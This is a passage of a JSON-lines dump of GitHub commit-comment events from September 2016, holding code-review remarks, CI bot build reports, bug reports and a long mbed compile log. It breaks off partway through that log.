{"id":"4558062643","type":"CommitCommentEvent","actor":{"login":"lgauthier"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":19008153,"position":5,"line":11,"path":"Tests/MethodSwizzling.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-13T20:27:33Z","updated_at":"2016-09-13T20:27:33Z","body":"What that part of the guidelines are talking about is when the type doesn't give you enough information. For example:\r\n\r\n```\r\nfunc findPerson(with name: String)\r\n```\r\n\r\nIt wouldn't be clear at the call site what was supposed to be passed because all the caller would see is that it's expecting a String."}},"created_at":"2016-09-13T20:27:33Z"}
{"id":"4558065546","type":"CommitCommentEvent","actor":{"login":"rapperskull"},"repo":{"name":"opengapps/opengapps"},"payload":{"comment":{"id":19008157,"position":null,"line":null,"path":null,"commit_id":"9655bb7afe345802a5e33b5d2f2cbb4d3306141b","created_at":"2016-09-13T20:28:03Z","updated_at":"2016-09-13T20:28:03Z","body":"@mfonville Unfortunately the Play Store version is an old one (which included the sound search by itself), while the one we have in the repo is a newer version and just provides a different widget to access the Google App music search."}},"created_at":"2016-09-13T20:28:03Z"}
{"id":"4558068923","type":"CommitCommentEvent","actor":{"login":"veronikaslc"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19008170,"position":19,"line":62,"path":"components/patient-data/impl/src/main/java/org/phenotips/data/internal/controller/AbstractSimpleController.java","commit_id":"9e2a07d6b1c7256321135aff498cd7cfe4d28937","created_at":"2016-09-13T20:28:37Z","updated_at":"2016-09-13T20:28:37Z","body":"provider is useful in all other places, as I checked"}},"created_at":"2016-09-13T20:28:37Z"}
{"id":"4558077231","type":"CommitCommentEvent","actor":{"login":"abellotti"},"repo":{"name":"matobet/manageiq"},"payload":{"comment":{"id":19008187,"position":5,"line":8,"path":"lib/extensions/ar_region.rb","commit_id":"0401c16fef5d1ba5f8b5aa5ae432834b1322140b","created_at":"2016-09-13T20:30:10Z","updated_at":"2016-09-13T20:30:10Z","body":"Huh ?  parse_id should have handled this.\r\n Let me ping simon.\r\n\r\n"}},"created_at":"2016-09-13T20:30:10Z"}
{"id":"4558078040","type":"CommitCommentEvent","actor":{"login":"gau-veldt"},"repo":{"name":"gau-veldt/OmegaRising"},"payload":{"comment":{"id":19008188,"position":null,"line":null,"path":null,"commit_id":"1bd6ce75bba03f540f48ba1a7040c5ae8d05917c","created_at":"2016-09-13T20:30:18Z","updated_at":"2016-09-13T20:30:18Z","body":"Screenshot example:\r\n![screenshot_57d85ee7674](https://cloud.githubusercontent.com/assets/1862162/18490183/bedb18a4-79b5-11e6-9bf8-9bfaf7e37769.png)\r\nGuess the checked pattern isn't there, just GIMP and Mate image viewer being stupid.\r\n"}},"created_at":"2016-09-13T20:30:18Z"}
{"id":"4558080684","type":"CommitCommentEvent","actor":{"login":"johnslay"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":19008201,"position":5,"line":11,"path":"Tests/MethodSwizzling.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-13T20:30:43Z","updated_at":"2016-09-13T20:30:43Z","body":"Yea that makes sense. Also, can't use just `for class:` what about `for classType:` `class` is a reserved word."}},"created_at":"2016-09-13T20:30:43Z"}
{"id":"4558085260","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19008215,"position":4,"line":599,"path":"test/components/navigationBarTest.js","commit_id":"3ff17ae253093af57f7d6282993eedf0cdf43789","created_at":"2016-09-13T20:31:29Z","updated_at":"2016-09-13T20:31:29Z","body":"Looks like the default timeout for `waitUntil` is 500ms, but I think for now we should drop the \"immediately\" because 500ms is kind of long. Initially I was going to suggest a shorter timeout, but I think it would be better to have a separate set of performance tests for individual actions"}},"created_at":"2016-09-13T20:31:29Z"}
{"id":"4558086363","type":"CommitCommentEvent","actor":{"login":"lgauthier"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":19008222,"position":5,"line":11,"path":"Tests/MethodSwizzling.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-13T20:31:42Z","updated_at":"2016-09-13T20:31:42Z","body":"Yes, `classType` would be what you want."}},"created_at":"2016-09-13T20:31:42Z"}
{"id":"4558086716","type":"CommitCommentEvent","actor":{"login":"misiek303"},"repo":{"name":"bsimser/sharepointmd"},"payload":{"comment":{"id":19008223,"position":null,"line":null,"path":null,"commit_id":"788fa0bdb7f6d5a748817de5982686faea59e4ff","created_at":"2016-09-13T20:31:45Z","updated_at":"2016-09-13T20:31:45Z","body":"Where is it ?"}},"created_at":"2016-09-13T20:31:45Z"}
{"id":"4558093401","type":"CommitCommentEvent","actor":{"login":"timvisee"},"repo":{"name":"timvisee/Dworek"},"payload":{"comment":{"id":19008245,"position":null,"line":null,"path":null,"commit_id":"0c7fecc62ef2c737fa6a9bf5dba72a38dd3dd314","created_at":"2016-09-13T20:33:00Z","updated_at":"2016-09-13T20:33:00Z","body":"Automated message:\r\n* [CircleCI](https://circleci.com/gh/timvisee/Dworek/205) build: Success\r\n* [TravisCI](https://travis-ci.org/timvisee/Dworek/builds/159707829) build: Success"}},"created_at":"2016-09-13T20:33:00Z"}
{"id":"4558094854","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19008251,"position":13,"line":608,"path":"test/components/navigationBarTest.js","commit_id":"3ff17ae253093af57f7d6282993eedf0cdf43789","created_at":"2016-09-13T20:33:17Z","updated_at":"2016-09-13T20:33:17Z","body":"I think a lot of the tests fail on travis because of timeouts. Was just discussing something I noticed here http://webdriver.io/api/utility/waitUntil.html\r\ntimeout === interval === 500ms\r\nSo we're wasting time with a long interval and timing out too early for slow machines"}},"created_at":"2016-09-13T20:33:17Z"}
{"id":"4558095725","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19008253,"position":4,"line":6,"path":"src/System.Reflection.Primitives/src/System/Reflection/Emit/Opcode.cs","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T20:33:25Z","updated_at":"2016-09-13T20:33:25Z","body":"Yeah, we disabled a lot of the netcore50 (==UAP10.0) configurations due to shared-library.  We had to redistribute the old binary so that shared-library would match.  Now that we're building for a new framework with new shared library (UAP10.1), those configurations were brought back."}},"created_at":"2016-09-13T20:33:25Z"}
{"id":"4558097168","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19008258,"position":null,"line":null,"path":null,"commit_id":"9cc2adf6b5a386c6a4fe91a1db9343dc890cbcc7","created_at":"2016-09-13T20:33:42Z","updated_at":"2016-09-13T20:33:42Z","body":"I don't see much comments about different sections and panels used in the code. Use enough comments to label each distinct section of the page.\r\n\r\nWhen you open one comment after closing/ending previous comment then given one line space between the two sections/comments. e.g. in line no. 456 and 457 (right), give one line space between `<!--END OF LITURARY AND CULTURAL -->` and ` <!--FILM AND MUSIC SOCIETY -->`.  \r\n\r\nAlso notice that you have mistakenly given one space after SOCIETY in latter comment of above example. Also in the former comment, spelling of LITERARY is wrong and you have not written SOCIETY after CULTURAL, also one space is there. Fix all such kinds of problems."}},"created_at":"2016-09-13T20:33:42Z"}
{"id":"4558098434","type":"CommitCommentEvent","actor":{"login":"veronikaslc"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19008262,"position":null,"line":null,"path":null,"commit_id":"9e2a07d6b1c7256321135aff498cd7cfe4d28937","created_at":"2016-09-13T20:33:55Z","updated_at":"2016-09-13T20:33:55Z","body":"That's exactly why I sent you on slack yesterday `seems to work, except one checkstyle interface building error ` 9:29 pm :)\r\nI actually made a change in main pom with 7004 (last file in this commit), but error was still there, so I was thinking to fix it today.\r\nThis is not a pull request yet, just a branch in development. I am committing working code not to loose in case of something :)"}},"created_at":"2016-09-13T20:33:55Z"}
{"id":"4558101932","type":"CommitCommentEvent","actor":{"login":"jamtur01"},"repo":{"name":"collectd/collectd"},"payload":{"comment":{"id":19008275,"position":null,"line":null,"path":null,"commit_id":"276d1e1bdfc3e02431bb05c06da7a16f80fa7e47","created_at":"2016-09-13T20:34:35Z","updated_at":"2016-09-13T20:34:35Z","body":"+1"}},"created_at":"2016-09-13T20:34:35Z"}
{"id":"4558102000","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19008276,"position":10,"line":612,"path":"test/components/navigationBarTest.js","commit_id":"bcc103a582ba886ffc1b2c9c5ad4e91eb615fd74","created_at":"2016-09-13T20:34:35Z","updated_at":"2016-09-13T20:34:35Z","body":"shouldn't this be deterministic? Why the `||`?"}},"created_at":"2016-09-13T20:34:35Z"}
{"id":"4558103389","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19008281,"position":null,"line":null,"path":null,"commit_id":"4fa6e07a363c95329edc1ab4ed89f9a407bbff13","created_at":"2016-09-13T20:34:50Z","updated_at":"2016-09-13T20:34:50Z","body":"TeamCity Units.NET :: Build and Test [Build 158](http://teamcity.chump.work/viewLog.html?buildId=704&buildTypeId=UnitsNet_BuildTest) is now running\n"}},"created_at":"2016-09-13T20:34:50Z"}
{"id":"4558103948","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19008283,"position":null,"line":null,"path":null,"commit_id":"9cc2adf6b5a386c6a4fe91a1db9343dc890cbcc7","created_at":"2016-09-13T20:34:56Z","updated_at":"2016-09-13T20:34:56Z","body":"Between line no. 539 and 540 (right), there is an indentation problem."}},"created_at":"2016-09-13T20:34:56Z"}
{"id":"4558104462","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19008286,"position":10,"line":612,"path":"test/components/navigationBarTest.js","commit_id":"bcc103a582ba886ffc1b2c9c5ad4e91eb615fd74","created_at":"2016-09-13T20:35:02Z","updated_at":"2016-09-13T20:35:02Z","body":"oh, for the travis issue you mentioned. I think that's a timeout issue"}},"created_at":"2016-09-13T20:35:02Z"}
{"id":"4558104470","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19008285,"position":null,"line":null,"path":null,"commit_id":"69c685c242f9be19d8e1f66481a2c106ab588ea6","created_at":"2016-09-13T20:35:02Z","updated_at":"2016-09-13T20:35:02Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-MacOS-10.9-clang: OK (2326 of 2329 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: ZSZ big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: MTD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-69c685c242f9be19d8e1f66481a2c106ab588ea6-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-69c685c242f9be19d8e1f66481a2c106ab588ea6-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-13T20:35:02Z"}
{"id":"4558106743","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19008290,"position":null,"line":null,"path":null,"commit_id":"4fa6e07a363c95329edc1ab4ed89f9a407bbff13","created_at":"2016-09-13T20:35:26Z","updated_at":"2016-09-13T20:35:26Z","body":"TeamCity Units.NET :: Build and Test [Build 158](http://teamcity.chump.work/viewLog.html?buildId=704&buildTypeId=UnitsNet_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 820 Build time: 0:0:36"}},"created_at":"2016-09-13T20:35:26Z"}
{"id":"4558109869","type":"CommitCommentEvent","actor":{"login":"ophthal"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19008296,"position":178,"line":3589,"path":"interface/forms/eye_mag/view.php","commit_id":"3fc6f93583913d77fc096f6d7015b7bd8a142472","created_at":"2016-09-13T20:35:57Z","updated_at":"2016-09-13T20:35:57Z","body":"Done."}},"created_at":"2016-09-13T20:35:57Z"}
{"id":"4558112131","type":"CommitCommentEvent","actor":{"login":"Khrog"},"repo":{"name":"Khrog/qw"},"payload":{"comment":{"id":19008301,"position":null,"line":null,"path":null,"commit_id":"c7d4b16ff0c2b3136f9635056b8c960dcd2668d3","created_at":"2016-09-13T20:36:21Z","updated_at":"2016-09-13T20:36:21Z","body":"Added Divine Shield, Changed Branch order, added some accomplishments, changed Divine Warrior behavior to increase survivability."}},"created_at":"2016-09-13T20:36:21Z"}
{"id":"4558114687","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19008309,"position":10,"line":612,"path":"test/components/navigationBarTest.js","commit_id":"bcc103a582ba886ffc1b2c9c5ad4e91eb615fd74","created_at":"2016-09-13T20:36:47Z","updated_at":"2016-09-13T20:36:47Z","body":"also in dev mode, the visible value in the URL bar is`''` so not sure why it's `chrome-extension://...about-newtab.html` in test mode"}},"created_at":"2016-09-13T20:36:47Z"}
{"id":"4558116637","type":"CommitCommentEvent","actor":{"login":"mikewhitby"},"repo":{"name":"Envalo/Widget"},"payload":{"comment":{"id":19008316,"position":5,"line":8,"path":"composer.json","commit_id":"80fc2e8e4d698ae38bfa5e82347eccb57f20f3b3","created_at":"2016-09-13T20:37:10Z","updated_at":"2016-09-13T20:37:10Z","body":"Is there a reason to require a specific version of composer installer? This is stopping me from using the module on my install as I don't have this specific composer installer (I have 3.0.5) - I've never seen any other module use anything other than \"*\" as a version expression."}},"created_at":"2016-09-13T20:37:10Z"}
{"id":"4558124190","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19008334,"position":10,"line":612,"path":"test/components/navigationBarTest.js","commit_id":"bcc103a582ba886ffc1b2c9c5ad4e91eb615fd74","created_at":"2016-09-13T20:38:29Z","updated_at":"2016-09-13T20:38:29Z","body":"oh, i think it's because `getAppUrl` is different in dev vs test, so tests don't map about: urls correctly. but not sure what's going on with Travis."}},"created_at":"2016-09-13T20:38:29Z"}
{"id":"4558125831","type":"CommitCommentEvent","actor":{"login":"NikoKrause"},"repo":{"name":"linuxmint/Cinnamon"},"payload":{"comment":{"id":19008341,"position":null,"line":null,"path":null,"commit_id":"b9344bb9829a3a2e8d886e60eda7d6dd64360a53","created_at":"2016-09-13T20:38:45Z","updated_at":"2016-09-13T20:38:45Z","body":"This doesn't fix the problem for me, which I have described in this issue https://github.com/linuxmint/Cinnamon/issues/5347\r\n\r\nIt made it even worse:\r\n![bildschirmfoto vom 2016-09-13 22-25-37](https://cloud.githubusercontent.com/assets/8415124/18490256/7b6c5492-7a01-11e6-9959-7ac949569ec7.png)\r\n![bildschirmfoto vom 2016-09-13 22-23-14](https://cloud.githubusercontent.com/assets/8415124/18490270/80b0c0d2-7a01-11e6-98a3-437fc27d107e.png)\r\n\r\nIt shows for \"Russian (Germany, phonetic)\" the German flag and it uses the abbreviation \"de\" instead of the previous \"ru\".\r\n\r\nNow it's impossible to see, which keyboard layout is activated.  Before that, i could at least turn of the flags and see \"de\" or \"ru\" depending if \"German\" or \"\"Russian (Germany, phonetic)\" was activated. Now it shows \"de\" for both.\r\n\r\nExpected behavior would be: \r\nGerman                                               {German flag <-> \"de\"}\r\nRussian (Germany, phonetic)    {Russian flag <-> \"ru\"}"}},"created_at":"2016-09-13T20:38:45Z"}
{"id":"4558131287","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19008364,"position":10,"line":612,"path":"test/components/navigationBarTest.js","commit_id":"bcc103a582ba886ffc1b2c9c5ad4e91eb615fd74","created_at":"2016-09-13T20:39:46Z","updated_at":"2016-09-13T20:39:46Z","body":"that's what I thought initially, but dev only adds the port for webpack"}},"created_at":"2016-09-13T20:39:46Z"}
{"id":"4558146539","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19008415,"position":null,"line":null,"path":null,"commit_id":"3c2174ebc20108fa25c3e7dbd5d1b1008372af9a","created_at":"2016-09-13T20:42:35Z","updated_at":"2016-09-13T20:42:35Z","body":"TaskCluster: @NinadBhat does not have permission to trigger tasks."}},"created_at":"2016-09-13T20:42:35Z"}
{"id":"4558146878","type":"CommitCommentEvent","actor":{"login":"millercl"},"repo":{"name":"heyarne/gulp-webdav-sync"},"payload":{"comment":{"id":19008418,"position":null,"line":null,"path":null,"commit_id":"9d59f4b0cb176e7467e3f367048fdbe4b6aab5ca","created_at":"2016-09-13T20:42:39Z","updated_at":"2016-09-13T20:42:39Z","body":"[v1.0.3](https://github.com/millercl/gulp-webdav-sync/releases/tag/v1.0.3) should also fix this issue."}},"created_at":"2016-09-13T20:42:39Z"}
{"id":"4558148590","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19008423,"position":null,"line":null,"path":null,"commit_id":"d265f3334142853a7f04fbda5bf6a62e3b5f672d","created_at":"2016-09-13T20:42:57Z","updated_at":"2016-09-13T20:42:57Z","body":"@volaya I've had to revert this change - it broke all the processing tests on Travis. Can you rework and push again?"}},"created_at":"2016-09-13T20:42:57Z"}
{"id":"4558150615","type":"CommitCommentEvent","actor":{"login":"bancer"},"repo":{"name":"cakephp/cakephp"},"payload":{"comment":{"id":19008427,"position":null,"line":null,"path":null,"commit_id":"5253f0b3bd06f3a1e3cc776e6dd90116a5a108e4","created_at":"2016-09-13T20:43:19Z","updated_at":"2016-09-13T20:43:19Z","body":"> '/test/tests/delete/2'\r\n\r\nIs it delete method in a plugin or is it the project installed in test subfolder?"}},"created_at":"2016-09-13T20:43:19Z"}
{"id":"4558154173","type":"CommitCommentEvent","actor":{"login":"theotherjimmy"},"repo":{"name":"theotherjimmy/mbed"},"payload":{"comment":{"id":19008436,"position":null,"line":null,"path":null,"commit_id":"2f3f42c75c778fd3319e3ee1ebd1010566d78441","created_at":"2016-09-13T20:43:57Z","updated_at":"2016-09-13T20:43:57Z","body":"example output:\r\n```\r\n$ mbed compile\r\nBuilding project mbed-os-example-blinky (K64F, GCC_ARM)\r\nScan: .\r\nScan: FEATURE_COMMON_PAL\r\nScan: FEATURE_UVISOR\r\nScan: FEATURE_BLE\r\nScan: FEATURE_CLIENT\r\nScan: FEATURE_IPV6\r\nScan: FEATURE_IPV4\r\nScan: FEATURE_STORAGE\r\nScan: mbed\r\nScan: env\r\n  0.4% Compile: greentea_serial.cpp\r\n  0.7% Compile: mbed-utest-shim.cpp\r\n  1.1% Compile: main.cpp\r\n  1.4% Compile: unity_handler.cpp\r\n  1.8% Compile: utest_case.cpp\r\n  2.1% Compile: utest_stack_trace.cpp\r\n  2.5% Compile: utest_default_handlers.cpp\r\n  2.8% Compile: test_env.cpp\r\n  3.2% Compile: aesni.c\r\n  3.5% Compile: arc4.c\r\n  3.9% Compile: unity.c\r\n  4.2% Compile: utest_greentea_handlers.cpp\r\n  4.6% Compile: utest_shim.cpp\r\n  4.9% Compile: asn1parse.c\r\n  5.3% Compile: utest_types.cpp\r\n  5.6% Compile: camellia.c\r\n  6.0% Compile: asn1write.c\r\n  6.3% Compile: blowfish.c\r\n  6.7% Compile: base64.c\r\n  7.0% Compile: certs.c\r\n  7.4% Compile: utest_harness.cpp\r\n  7.7% Compile: cipher_wrap.c\r\n  8.1% Compile: aes.c\r\n  8.5% Compile: dhm.c\r\n  8.8% Compile: des.c\r\n  9.2% Compile: ccm.c\r\n  9.5% Compile: ecdh.c\r\n  9.9% Compile: ecjpake.c\r\n 10.2% Compile: ctr_drbg.c\r\n 10.6% Compile: cipher.c\r\n 10.9% Compile: debug.c\r\n 11.3% Compile: entropy_poll.c\r\n 11.6% Compile: havege.c\r\n 12.0% Compile: ecdsa.c\r\n 12.3% Compile: entropy.c\r\n 12.7% Compile: md2.c\r\n 13.0% Compile: hmac_drbg.c\r\n 13.4% Compile: md4.c\r\n 13.7% Compile: ecp_curves.c\r\n 14.1% Compile: md.c\r\n 14.4% Compile: md5.c\r\n 14.8% Compile: memory_buffer_alloc.c\r\n 15.1% Compile: net.c\r\n 15.5% Compile: gcm.c\r\n 15.8% Compile: md_wrap.c\r\n 16.2% Compile: padlock.c\r\n 16.5% Compile: pkcs11.c\r\n 16.9% Compile: error.c\r\n 17.3% Compile: pkcs12.c\r\n 17.6% Compile: pem.c\r\n 18.0% Compile: pkcs5.c\r\n 18.3% Compile: bignum.c\r\n 18.7% Compile: oid.c\r\n 19.0% Compile: pk.c\r\n 19.4% Compile: platform.c\r\n 19.7% Compile: ripemd160.c\r\n 20.1% Compile: sha1.c\r\n 20.4% Compile: pk_wrap.c\r\n 20.8% Compile: pkwrite.c\r\n 21.1% Compile: ssl_cache.c\r\n 21.5% Compile: ssl_ciphersuites.c\r\n 21.8% Compile: pkparse.c\r\n 22.2% Compile: ssl_cookie.c\r\n 22.5% Compile: ecp.c\r\n 22.9% Compile: sha256.c\r\n 23.2% Compile: ssl_ticket.c\r\n 23.6% Compile: sha512.c\r\n 23.9% Compile: threading.c\r\n 24.3% Compile: timing.c\r\n 24.6% Compile: version.c\r\n 25.0% Compile: x509_create.c\r\n 25.4% Compile: version_features.c\r\n 25.7% Compile: rsa.c\r\n 26.1% Compile: x509_csr.c\r\n 26.4% Compile: x509write_crt.c\r\n 26.8% Compile: x509write_csr.c\r\n 27.1% Compile: xtea.c\r\n 27.5% Compile: x509.c\r\n 27.8% Compile: x509_crl.c\r\n 28.2% Compile: hardware_init_MK64F12.c\r\n 28.5% Compile: lwip_checksum.c\r\n 28.9% Compile: lwip_memcpy.c\r\n 29.2% Compile: ssl_cli.c\r\n 29.6% Compile: EthernetInterface.cpp\r\n 29.9% Compile: k64f_emac.c\r\n 30.3% Compile: lwip_sys_arch.c\r\n 30.6% Compile: ssl_srv.c\r\n 31.0% Compile: lwip_err.c\r\n 31.3% Compile: lwip_netdb.c\r\n 31.7% Compile: lwip_api_lib.c\r\n 32.0% Compile: lwip_netbuf.c\r\n 32.4% Compile: lwip_netifapi.c\r\n 32.7% Compile: lwip_sockets.c\r\n 33.1% Compile: x509_crt.c\r\n 33.5% Compile: lwip_autoip.c\r\n 33.8% Compile: lwip_inet.c\r\n 34.2% Compile: lwip_tcpip.c\r\n 34.5% Compile: lwip_icmp.c\r\n 34.9% Compile: lwip_api_msg.c\r\n 35.2% Compile: lwip_inet_chksum.c\r\n 35.6% Compile: lwip_igmp.c\r\n 35.9% Compile: lwip_ip.c\r\n 36.3% Compile: lwip_def.c\r\n 36.6% Compile: lwip_ip_addr.c\r\n 37.0% Compile: lwip_ip_frag.c\r\n 37.3% Compile: lwip_init.c\r\n 37.7% Compile: lwip_memp.c\r\n 38.0% Compile: lwip_mem.c\r\n 38.4% Compile: lwip_raw.c\r\n 38.7% Compile: lwip_netif.c\r\n 39.1% Compile: lwip_dns.c\r\n 39.4% Compile: lwip_stats.c\r\n 39.8% Compile: lwip_pbuf.c\r\n 40.1% Compile: lwip_dhcp.c\r\n 40.5% Compile: lwip_timers.c\r\n 40.8% Compile: lwip_asn1_dec.c\r\n 41.2% Compile: lwip_asn1_enc.c\r\n 41.5% Compile: lwip_mib2.c\r\n 41.9% Compile: lwip_tcp_out.c\r\n 42.3% Compile: lwip_udp.c\r\n 42.6% Compile: lwip_mib_structs.c\r\n 43.0% Compile: lwip_msg_in.c\r\n 43.3% Compile: lwip_tcp_in.c\r\n 43.7% Compile: lwip_msg_out.c\r\n 44.0% Compile: lwip_ethernetif.c\r\n 44.4% Compile: lwip_tcp.c\r\n 44.7% Compile: lwip_slipif.c\r\n 45.1% Compile: lwip_auth.c\r\n 45.4% Compile: ssl_tls.c\r\n 45.8% Compile: lwip_chap.c\r\n 46.1% Compile: lwip_chpms.c\r\n 46.5% Compile: lwip_ipcp.c\r\n 46.8% Compile: lwip_fsm.c\r\n 47.2% Compile: lwip_lcp.c\r\n 47.5% Compile: lwip_etharp.c\r\n 47.9% Compile: lwip_md5.c\r\n 48.2% Compile: lwip_magic.c\r\n 48.6% Compile: lwip_pap.c\r\n 48.9% Compile: lwip_ppp_oe.c\r\n 49.3% Compile: lwip_ppp.c\r\n 49.6% Compile: lwip_randm.c\r\n 50.0% Compile: lwip_vj.c\r\n 50.4% Compile: lwip_stack.c\r\n 50.7% Compile: Socket.cpp\r\n 51.1% Compile: UDPSocket.cpp\r\n 51.4% Compile: nsapi_dns.cpp\r\n 51.8% Compile: TCPSocket.cpp\r\n 52.1% Compile: NetworkStack.cpp\r\n 52.5% Compile: TCPServer.cpp\r\n 52.8% Compile: cfstore_fnmatch.c\r\n 53.2% Compile: SocketAddress.cpp\r\n 53.5% Compile: strategy.c\r\n 53.9% Compile: support_funcs.c\r\n 54.2% Compile: cfstore_test.c\r\n 54.6% Compile: BusIn.cpp\r\n 54.9% Compile: AnalogIn.cpp\r\n 55.3% Compile: CAN.cpp\r\n 55.6% Compile: BusOut.cpp\r\n 56.0% Compile: BusInOut.cpp\r\n 56.3% Compile: Ethernet.cpp\r\n 56.7% Compile: CallChain.cpp\r\n 57.0% Compile: FileLike.cpp\r\n 57.4% Compile: FilePath.cpp\r\n 57.7% Compile: FileBase.cpp\r\n 58.1% Compile: I2CSlave.cpp\r\n 58.5% Compile: FileSystemLike.cpp\r\n 58.8% Compile: I2C.cpp\r\n 59.2% Compile: LocalFileSystem.cpp\r\n 59.5% Compile: configuration_store.c\r\n 59.9% Compile: InterruptManager.cpp\r\n 60.2% Compile: InterruptIn.cpp\r\n 60.6% Compile: RawSerial.cpp\r\n 60.9% Compile: SPISlave.cpp\r\n 61.3% Compile: SPI.cpp\r\n 61.6% Compile: Serial.cpp\r\n 62.0% Compile: mbed_alloc_wrappers.cpp\r\n 62.3% Compile: TimerEvent.cpp\r\n 62.7% Compile: Timeout.cpp\r\n 63.0% Compile: Ticker.cpp\r\n 63.4% Compile: mbed_assert.c\r\n 63.7% Compile: SerialBase.cpp\r\n[Warning] SerialBase.cpp@34,23: comparison between signed and unsigned integer expressions [-Wsign-compare]\r\n 64.1% Compile: Timer.cpp\r\n 64.4% Compile: Stream.cpp\r\n 64.8% Compile: mbed_board.c\r\n 65.1% Compile: mbed_error.c\r\n 65.5% Compile: mbed_lp_ticker_api.c\r\n 65.8% Compile: mbed_critical.c\r\n 66.2% Compile: mbed_interface.c\r\n 66.5% Compile: mbed_gpio.c\r\n 66.9% Compile: mbed_mem_trace.c\r\n 67.3% Compile: mbed_pinmap_common.c\r\n 67.6% Compile: mbed_semihost_api.c\r\n 68.0% Compile: mbed_wait_api_no_rtos.c\r\n 68.3% Compile: mbed_us_ticker_api.c\r\n 68.7% Compile: startup_MK64F12.S\r\n 69.0% Compile: mbed_ticker_api.c\r\n 69.4% Compile: cmsis_nvic.c\r\n 69.7% Compile: system_MK64F12.c\r\n 70.1% Compile: crc.c\r\n 70.4% Compile: mbed_rtc_time.cpp\r\n 70.8% Compile: PeripheralPins.c\r\n 71.1% Compile: fsl_clock_config.c\r\n 71.5% Compile: mbed_overrides.c\r\n 71.8% Compile: fsl_phy.c\r\n 72.2% Compile: mbed_wait_api_rtos.cpp\r\n 72.5% Compile: fsl_adc16.c\r\n 72.9% Compile: fsl_cmp.c\r\n 73.2% Compile: fsl_common.c\r\n 73.6% Compile: fsl_crc.c\r\n 73.9% Compile: fsl_cmt.c\r\n 74.3% Compile: retarget.cpp\r\n 74.6% Compile: fsl_dmamux.c\r\n 75.0% Compile: fsl_dac.c\r\n 75.4% Compile: fsl_ewm.c\r\n 75.7% Compile: fsl_flexbus.c\r\n 76.1% Compile: fsl_clock.c\r\n 76.4% Compile: fsl_dspi_edma.c\r\n 76.8% Compile: fsl_enet.c\r\n[Warning] fsl_enet.c@493,29: comparison between pointer and integer\r\n 77.1% Compile: fsl_edma.c\r\n 77.5% Compile: fsl_gpio.c\r\n 77.8% Compile: fsl_flash.c\r\n 78.2% Compile: fsl_dspi.c\r\n 78.5% Compile: fsl_lptmr.c\r\n 78.9% Compile: fsl_ftm.c\r\n 79.2% Compile: fsl_llwu.c\r\n 79.6% Compile: fsl_flexcan.c\r\n 79.9% Compile: fsl_i2c_edma.c\r\n 80.3% Compile: fsl_mpu.c\r\n 80.6% Compile: fsl_pdb.c\r\n 81.0% Compile: fsl_pmc.c\r\n 81.3% Compile: fsl_pit.c\r\n 81.7% Compile: fsl_rcm.c\r\n 82.0% Compile: fsl_rnga.c\r\n 82.4% Compile: fsl_sim.c\r\n 82.7% Compile: fsl_rtc.c\r\n 83.1% Compile: fsl_smc.c\r\n 83.5% Compile: fsl_i2c.c\r\n 83.8% Compile: fsl_sai_edma.c\r\n 84.2% Compile: fsl_wdog.c\r\n 84.5% Compile: fsl_uart_edma.c\r\n 84.9% Compile: fsl_vref.c\r\n 85.2% Compile: entropy_hardware_poll.c\r\n 85.6% Compile: fsl_sai.c\r\n 85.9% Compile: pwmout_api.c\r\n 86.3% Compile: fsl_sdhc.c\r\n 86.6% Compile: fsl_uart.c\r\n 87.0% Compile: us_ticker.c\r\n 87.3% Compile: spi_api.c\r\n 